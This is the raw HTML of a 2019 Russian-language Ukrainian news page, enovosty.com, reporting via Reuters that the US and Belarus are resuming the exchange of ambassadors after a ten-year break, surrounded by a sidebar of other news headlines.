href="https://enovosty.com/news_economy/full/1709-ukraina-smozhet-zanimatsya-tranzitom-gaza-v-es-cherez-svoyu-territoriyu-bez-zaklyucheniya-novogo-dogovora">Украина сможет заниматься транзитом газа в ЕС через свою территорию без заключения нового договора</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773316"> <span class="postDate">14:11</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1709-v-ukraine-rezko-sokratilos-kolichestvo-bezrabotnyx">В Украине резко сократилось количество безработных</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773286"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-kuda-ni-plyun-popadesh-v-zabor-zhiteli-kryma-zhaluyutsya-na-okkupacionnuyu-vlast">“Куда ни плюнь, попадешь в забор”: жители Крыма жалуются на оккупационную власть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773284"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-posobie-na-novorozhdennogo-v-ukraine-rasschitan-razmer-vyplaty-v-2020-godu">Пособие на новорожденного в Украине: рассчитан размер выплаты в 2020 году</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773313"> <span class="postDate">13:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-evropu-zhdet-samaya-surovaya-zima-za-poslednie-30-let">Европу ждет самая суровая зима за последние 30 лет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773311"> <span class="postDate">13:52</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-uchenye-kogda-nelzya-est-yaichnicu-na-zavtrak">Ученые: Когда нельзя есть яичницу на завтрак</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773297"> <span class="postDate">13:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-minske-prokommentirovali-sozdanie-konfederacii-s-rossiej">В Минске прокомментировали создание конфедерации с Россией</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773309"> <span class="postDate">13:32</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1709-ubijstvo-terrorista-dzhumaeva-kak-pervyj-akt-serii-likvidacij-zloj-odessit">Убийство террориста Джумаева как первый акт серии ликвидаций, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773263"> <span class="postDate">13:28</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-sinoptik-zavtra-v-ukrainu-pridet-osennyaya-dozhdlivaya-pogoda">Синоптик: Завтра в Украину придет осенняя дождливая погода</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773281"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-uchenye-rasskazali-pochemu-ne-stoit-uvlekatsya-sushi">Ученые рассказали, почему не стоит увлекаться сушами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773292"> <span class="postDate">13:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-nad-okkupirovannym-donbassom-razbrosali-ukrainskie-patrioticheskie-listovki-foto">Над оккупированным Донбассом разбросали украинские патриотические листовки (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773289"> <span class="postDate">13:07</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video">В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773279"> <span class="postDate">12:41</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-%e2%80%8bv-centre-virusologii-v-rossii-gde-xranyatsya-virusy-ebola-i-ospy-proizoshel-vzryv">​В центре вирусологии в России, где хранятся вирусы Эбола и оспы, произошел взрыв</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773273"> <span class="postDate">12:31</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-dietologi-nazvali-dostupnye-produkty-kotorye-bez-lekarstv-snizhayut-davlenie">Диетологи назвали доступные продукты, которые без лекарств снижают давление</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773272"> <span class="postDate">12:27</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1709-ukraincev-zastavyat-rasskazat-gosudarstvu-vsyo-o-svoem-imushhestve-inache-nakazanie">Украинцев заставят рассказать государству всё о своем имуществе. Иначе - наказание</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773267"> <span class="postDate">12:18</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1709-eksperty-rasskazali-skolko-i-za-kakie-nomernye-znaki-dlya-avto-nado-platit">Эксперты рассказали, сколько и за какие номерные знаки для авто надо платить</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773260"> <span class="postDate">12:07</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1709-zelenskij-i-zelenskij-dogovarivayutsya-s-kolomojskim-po-privatbanku-pojdet-li-ukraina-na-sdelku-s-dyavolom">Зеленский и Богдан договариваются с Коломойским по Приватбанку: Пойдет ли Украина на сделку с дьяволом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773261"> <span class="postDate">12:04</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-voennaya-moshh-kitaya-bystro-stanovitsya-samoj-bolshoj-ugrozoj-voennomu-prevosxodstvu-ssha">Военная мощь Китая быстро становится самой большой угрозой военному превосходству США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773257"> <span class="postDate">11:54</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1709-xotyat-lgot-i-kreditov-v-ukraine-sudostroiteli-gotovy-vypuskat-do-30-korablej-v-god">Хотят льгот и кредитов: В Украине судостроители готовы выпускать до 30 кораблей в год</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4773462"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_abroad">Новости мира</a> <span>&raquo;</span> Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва</div><time datetime="2019-09-17T21:04:58+03:00"><span id="date">Новости мира, 17.09.2019 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=Reuters%3A+%D0%A1%D0%A8%D0%90+%D0%B8+%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C+%D0%B2%D0%BE%D0%B7%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D1%8F%D1%8E%D1%82+%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD+%D0%BF%D0%BE%D1%81%D0%BB%D0%B0%D0%BC%D0%B8+%D0%BF%D0%BE%D1%81%D0%BB%D0%B5+%D0%B4%D0%B5%D1%81%D1%8F%D1%82%D0%B8%D0%BB%D0%B5%D1%82%D0%BD%D0%B5%D0%B3%D0%BE+%D0%BF%D0%B5%D1%80%D0%B5%D1%80%D1%8B%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva&via=enovosty" data-link="https://twitter.com/intent/tweet?text=Reuters%3A+%D0%A1%D0%A8%D0%90+%D0%B8+%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C+%D0%B2%D0%BE%D0%B7%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D1%8F%D1%8E%D1%82+%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD+%D0%BF%D0%BE%D1%81%D0%BB%D0%B0%D0%BC%D0%B8+%D0%BF%D0%BE%D1%81%D0%BB%D0%B5+%D0%B4%D0%B5%D1%81%D1%8F%D1%82%D0%B8%D0%BB%D0%B5%D1%82%D0%BD%D0%B5%D0%B3%D0%BE+%D0%BF%D0%B5%D1%80%D0%B5%D1%80%D1%8B%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4773462" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Дэвид Хейл сообщил, что США и Беларусь приняли решение о возобновлении обмена послами после 10-летнего перерыва</p></b> <div style="text-align:center;"><img width="460" height="302" src="https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4-460x302.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4.jpg 460w, https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4-112x74.jpg 112w, https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4-300x197.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p>Заместитель государственного секретаря США по политическим вопросам Дэвид Хейл во время поездки в Минск сообщил, что Соединенные Штаты Америки и Беларусь приняли решение о возвращении послов после 10-летнего <a class="tag" href="https://enovosty.com/tag/pereryv" target="_blank">перерыв</a>а, &#8212; сообщает Андрей Макховский в издании Reuters , информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Беларусь годами вызывала критику Запада из-за ситуации в стране с правами человека и подавлением политического инакомыслия.</p><p><img src="https://enovosty.com/wp-content/uploads/2019/09/v-es-otreagirovali-na-zaderzhanija-vo-vremja-aktsij-protestov-v-belarusi_rect_2a85b17c7221f427d26ad2d09c9b2c38.jpg" title="Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва" alt="Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва" width="460" height="257" class="aligncenter size-full wp-image-4773464" srcset="https://enovosty.com/wp-content/uploads/2019/09/v-es-otreagirovali-na-zaderzhanija-vo-vremja-aktsij-protestov-v-belarusi_rect_2a85b17c7221f427d26ad2d09c9b2c38.jpg 460w, https://enovosty.com/wp-content/uploads/2019/09/v-es-otreagirovali-na-zaderzhanija-vo-vremja-aktsij-protestov-v-belarusi_rect_2a85b17c7221f427d26ad2d09c9b2c38-112x63.jpg 112w, https://enovosty.com/wp-content/uploads/2019/09/v-es-otreagirovali-na-zaderzhanija-vo-vremja-aktsij-protestov-v-belarusi_rect_2a85b17c7221f427d26ad2d09c9b2c38-300x168.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></p><p>Выступая во вторник, 17 сентября, на встрече с президентом Беларуси Александром Лукашенко, Хейл сказал, что Вашингтон «решительно поддерживает суверенитет и независимость Беларуси».</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_politics/full/709-advokat-zayavil-o-tom-chto-dolgozhdanny-obmen-delo-neskolkix-chasov" >Адвокат заявил о том, что долгожданны “обмен - дело нескольких часов”</a></p><p>Напомним, ранее из-за угрозы суверенитету страны со стороны России Лукашенко неоднократно призывал прекратить разговоры о возможном присоединении Беларуси к России. </p><div class="tptn_counter" style="color:white;" id="tptn_counter_4773462"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4773462&amp;_wpnonce=b71a6086a8"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2019-09-17T21:04:58+03:00"/><meta itemprop="dateModified" content="2019-09-17T23:03:04+03:00"/><meta itemprop="genre" content="Новости мира"/><meta itemprop="description" content="Дэвид Хейл сообщил, что США и Беларусь приняли решение о возобновлении обмена послами после 10-летнего перерыва"/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4-460x302.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/09/bez-nazvanija-1-4-460x302.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="302"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/obmen" rel="tag">обмен</a>, <a href="https://enovosty.com/tag/pereryv" rel="tag">перерыв</a>, <a href="https://enovosty.com/tag/posol" rel="tag">посол</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 111</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=Reuters%3A+%D0%A1%D0%A8%D0%90+%D0%B8+%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C+%D0%B2%D0%BE%D0%B7%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D1%8F%D1%8E%D1%82+%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD+%D0%BF%D0%BE%D1%81%D0%BB%D0%B0%D0%BC%D0%B8+%D0%BF%D0%BE%D1%81%D0%BB%D0%B5+%D0%B4%D0%B5%D1%81%D1%8F%D1%82%D0%B8%D0%BB%D0%B5%D1%82%D0%BD%D0%B5%D0%B3%D0%BE+%D0%BF%D0%B5%D1%80%D0%B5%D1%80%D1%8B%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva&via=enovosty" data-link="https://twitter.com/intent/tweet?text=Reuters%3A+%D0%A1%D0%A8%D0%90+%D0%B8+%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C+%D0%B2%D0%BE%D0%B7%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D1%8F%D1%8E%D1%82+%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD+%D0%BF%D0%BE%D1%81%D0%BB%D0%B0%D0%BC%D0%B8+%D0%BF%D0%BE%D1%81%D0%BB%D0%B5+%D0%B4%D0%B5%D1%81%D1%8F%D1%82%D0%B8%D0%BB%D0%B5%D1%82%D0%BD%D0%B5%D0%B3%D0%BE+%D0%BF%D0%B5%D1%80%D0%B5%D1%80%D1%8B%D0%B2%D0%B0&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4773462" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"><style type="text/css">#wp-social-login-connect-with{clear:both;display:block;font-size:13px;font-weight:normal;padding-top:6px}#wp-social-login-connect-options{padding:4px 0}#wp-social-login-connect-options a{text-decoration:none;margin-right:5px}#wp-social-login-connect-options img{border:0 none;width:22px}.wsl_connect_with_provider{}</style><div class="wp-social-login-widget"><div class="wp-social-login-connect-with">Войти с помощью:</div><div class="wp-social-login-provider-list"><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Facebook&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" title="Connect with Facebook" class="wp-social-login-provider wp-social-login-provider-facebook" data-provider="Facebook"><img alt="Facebook" title="Connect with Facebook" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/facebook.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Google&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" title="Connect with Google" class="wp-social-login-provider wp-social-login-provider-google" data-provider="Google"><img alt="Google" title="Connect with Google" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/google.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Twitter&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva" title="Connect with Twitter" class="wp-social-login-provider wp-social-login-provider-twitter" data-provider="Twitter"><img alt="Twitter" title="Connect with Twitter" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/twitter.png" /></a></div><div class="wp-social-login-widget-clearing"></div></div> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="a20b1956bb" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4773364"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/1709-itogi-dnya-demarsh-ukrainy-cena-russkogo-mira-i-monstr-v-vostoka">Итоги дня: Демарш Украины, цена "русского мира" и монстр c востока</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4773249"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1709-polovina-deneg-na-oboronku-dorogi-i-dolgi-byudzhet-2020-v-cifrax-i-ocenkax-ekspertov">Половина денег на оборонку, дороги и долги: Бюджет 2020 в цифрах и оценках экспертов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4773136"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1609-itogi-dnya-panika-na-birzhax-rasplata-za-krov-kiborgov-i-vtoraya-zajceva-v-xarkove">Итоги дня: Паника на биржах, расплата за кровь "киборгов" и "вторая Зайцева" в Харькове</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772822"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1309-itogi-dnya-troyanskij-kon-putina-novaya-realnost-v-ukraine-i-silnaya-rech-sencova">Итоги дня: "Троянский конь" Путина, "новая реальность" в Украине и сильная речь Сенцова</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772788"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1309-ze-panika-prokuratorov-i-monopolizaciya-vlasti">Зе-паника прокураторов и монополизация власти</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772652"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1209-itogi-dnya-novyj-plan-putina-v-ukraine-nakazanie-dlya-narushitelej-v-rade-i-udar-po-rf-ot-es">Итоги дня: Новый план Путина в Украине, преступление и наказание в Раде и удар по РФ от ЕС</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772482"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1109-itogi-vazhnoe-reshenie-po-cemaxu-zhestkaya-draka-chinovnic-i-vzryvy-na-voennyx-skladax">Итоги дня: Важное решение по Цемаху, жесткая драка чиновниц и газовый "козырь" Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772392"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1109-cena-kompromissa-kogda-zakonchitsya-vojna-na-donbasse-i-kakuyu-cenu-zaplatit-ukraina">Цена компромисса: когда закончится война на Донбассе и какую цену заплатит Украина?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772330"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1009-itogi-dnya-impichment-s-podvoxom-bond-v-putinskom-dvore-i-gromkoe-zayavlenie-netanyaxu">Итоги дня: Импичмент с подвохом, "бонд" в путинском дворе и громкое заявление Нетаньяху</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4772228"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1009-plennye-vernulis-voprosy-ostalis">Пленные вернулись. Вопросы остались…</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
